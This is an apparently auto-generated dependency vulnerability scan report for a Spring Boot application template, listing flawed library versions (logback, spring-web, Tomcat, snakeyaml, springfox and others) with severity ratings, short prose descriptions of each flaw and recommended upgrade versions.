  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.

Overview

ch.qos.logback:logback-core is a logback-core module.

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the logback receiver component. An attacker can mount a denial-of-service attack by sending poisoned data.

Note:

Successful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.

Remediation

Upgrade ch.qos.logback:logback-core to version 1.2.13, 1.3.14, 1.4.14 or higher.

References

high severity

Open Redirect

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.1.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Open Redirect when UriComponentsBuilder parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.

Remediation

Upgrade org.springframework:spring-web to version 5.3.32, 6.0.17, 6.1.4 or higher.

References

high severity

Open Redirect

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.1.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.10.

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Open Redirect when using UriComponentsBuilder to parse an externally provided URL and perform validation checks on the host of the parsed URL.

Note: This is the same as CVE-2024-22243, but with different input.

Remediation

Upgrade org.springframework:spring-web to version 5.3.33, 6.0.18, 6.1.5 or higher.

References

high severity

HTTP Header Injection

  • Vulnerable module: org.springframework.hateoas:spring-hateoas
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@1.5.5.

Overview

Affected versions of this package are vulnerable to HTTP Header Injection via the handling of untrusted (X-)Forwarded headers. An attacker can manipulate hypermedia-based responses by injecting malicious content into these headers. This could lead to unauthorized access or misleading information being displayed to the user, compromising the application's data integrity and confidentiality. This is only exploitable if the application uses Spring WebFlux and Spring HATEOAS to generate links in hypermedia-based responses and does not have a mechanism to guard against clients submitting (X-)Forwarded headers.

Remediation

Upgrade org.springframework.hateoas:spring-hateoas to version 1.5.5, 2.0.5, 2.1.1 or higher.

References

high severity

GPL-2.0 license

  • Module: mysql:mysql-connector-java
  • Introduced through: mysql:mysql-connector-java@8.0.30

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b mysql:mysql-connector-java@8.0.30

GPL-2.0 license

medium severity

Session Fixation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Session Fixation via the rewrite valve if enabled for a web application. An attacker can gain unauthorized access to another user's session by crafting a request that allows session fixation.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.106, 10.1.42, 11.0.8 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.2.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.9.

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the form of improper ETag prefix validation when parsing ETags from the If-Match or If-None-Match request headers. An attacker can exploit this vulnerability to cause denial of service by sending a maliciously crafted conditional HTTP request.

Workaround

Users of older, unsupported versions could enforce a size limit on If-Match and If-None-Match headers, e.g. through a Filter.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.springframework:spring-web to version 5.3.38, 6.0.23, 6.1.12 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Denial of Service (DoS) via MVC controller @RequestBody byte[] method parameters.

Note: This vulnerable open source versions are no longer supported and the fixed version 5.3.42 is only available for the commercial release.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.springframework:spring-webmvc to version 6.0.0 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.springframework.boot:spring-boot-actuator-autoconfigure
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.3.11.

Overview

Affected versions of this package are vulnerable to Improper Input Validation via the EndpointRequest.to() function that creates a matcher for null/** if the actuator endpoint, for which the EndpointRequest has been created, is disabled or not exposed.

Note:

This is only exploitable if all of the following conditions are met:

  1. EndpointRequest.to() has been used in a Spring Security chain configuration;

  2. The endpoint which EndpointRequest references is disabled or not exposed via web;

  3. Your application handles requests to /null and this path needs protection.

Workaround

This can be mitigated by either:

  1. Making sure that the endpoint to which EndpointRequest.to() is referring to is enabled and exposed via web;

  2. Make sure that you don't handle requests to /null.

Remediation

Upgrade org.springframework.boot:spring-boot-actuator-autoconfigure to version 3.3.11, 3.4.5 or higher.

References

medium severity

Arbitrary Code Execution

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Arbitrary Code Execution in the Constructor class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the SafeConstructor class.

The maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.

Remediation

Upgrade org.yaml:snakeyaml to version 2.0 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: io.springfox:springfox-swagger-ui
  • Introduced through: io.springfox:springfox-swagger-ui@3.0.0

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0

Overview

io.springfox:springfox-swagger-ui is an Automated JSON API documentation for API's built with Spring

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). This is due to a bypass of a previous XSS vulnerability.

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

There is no fixed version for io.springfox:springfox-swagger-ui.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.16.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.16.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Access Restriction Bypass. If the ROOT (default) web application is configured to use FORM authentication then it is possible that a specially crafted URL could be used to trigger a redirect to an URL of the attackers choice.

The vulnerability is limited to the ROOT (default) web application.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.93, 9.0.80, 10.1.13, 11.0.0-M11 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.8.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.

NOTE: After upgrading to the fixed version, the setFileCountMax() must be explicitly set to avoid this vulnerability.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.85, 9.0.71, 10.1.5, 11.0.0-M3 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.springframework:spring-expression
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1, org.springframework.boot:spring-boot-starter-security@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@1.5.5.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.11.
